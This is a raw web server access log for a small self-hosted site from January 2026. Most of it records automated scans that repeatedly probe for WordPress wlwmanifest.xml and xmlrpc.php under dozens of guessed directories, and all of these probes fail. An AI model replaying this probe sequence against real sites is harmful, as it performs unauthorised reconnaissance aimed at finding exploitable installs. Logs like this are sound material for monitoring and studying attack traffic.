x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:31 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:31 +0000] - 404 404 - GET https profibot.synology.me "//wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 404 404 - GET https profibot.synology.me "//xmlrpc.php?rsd" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 404 404 - GET https profibot.synology.me "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 404 404 - GET https profibot.synology.me "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 404 404 - GET https profibot.synology.me "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:32 +0000] - 404 404 - GET https profibot.synology.me "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:33 +0000] - 404 404 - GET https profibot.synology.me "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - 404 404 - GET https profibot.synology.me "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - 404 404 - GET https profibot.synology.me "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - 404 404 - GET https profibot.synology.me "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - 404 404 - GET https profibot.synology.me "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - 404 404 - GET https profibot.synology.me "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[22/Jan/2026:23:54:34 +0000] - - 400 - - https profibot.synology.me "-" [Client 208.84.101.154] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[23/Jan/2026:11:51:02 +0000] - - 301 - GET http profibot.synology.me "/" [Client 208.84.101.154] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:03 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:03 +0000] - 404 404 - GET https profibot.synology.me "//wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:03 +0000] - 404 404 - GET https profibot.synology.me "//xmlrpc.php?rsd" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:04 +0000] - 404 404 - GET https profibot.synology.me "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:05 +0000] - 404 404 - GET https profibot.synology.me "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:06 +0000] - 404 404 - GET https profibot.synology.me "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:06 +0000] - 404 404 - GET https profibot.synology.me "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:06 +0000] - 404 404 - GET https profibot.synology.me "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[23/Jan/2026:11:51:06 +0000] - - 400 - - https profibot.synology.me "-" [Client 208.84.101.154] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[23/Jan/2026:15:19:07 +0000] - - 301 - GET http profibot.synology.me "/" [Client 176.65.132.227] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2503.0 Safari/537.36" "-" +[23/Jan/2026:15:19:07 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 176.65.132.227] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2503.0 Safari/537.36" "http://profibot.synology.me/" +[23/Jan/2026:22:23:20 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 138.246.253.24] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[23/Jan/2026:22:49:02 +0000] - - 301 - GET http profibot.synology.me "/" [Client 18.213.106.41] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36" "-" +[23/Jan/2026:22:49:03 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 18.213.106.41] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36" "-" +[24/Jan/2026:13:21:37 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 34.90.229.81] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[25/Jan/2026:01:55:54 +0000] - - 301 - GET http profibot.synology.me "/" [Client 208.84.101.154] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 404 404 - GET https profibot.synology.me "//wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 404 404 - GET https profibot.synology.me "//xmlrpc.php?rsd" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12679] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 404 404 - GET https profibot.synology.me "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:55 +0000] - 404 404 - GET https profibot.synology.me "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:56 +0000] - 404 404 - GET https profibot.synology.me "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:57 +0000] - 404 404 - GET https profibot.synology.me "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:01:55:58 +0000] - - 400 - - https profibot.synology.me "-" [Client 208.84.101.154] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[25/Jan/2026:20:40:26 +0000] - - 301 - GET http profibot.synology.me "/" [Client 208.84.101.154] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:27 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:27 +0000] - 404 404 - GET https profibot.synology.me "//wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:27 +0000] - 404 404 - GET https profibot.synology.me "//xmlrpc.php?rsd" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 208.84.101.154] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:28 +0000] - 404 404 - GET https profibot.synology.me "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" 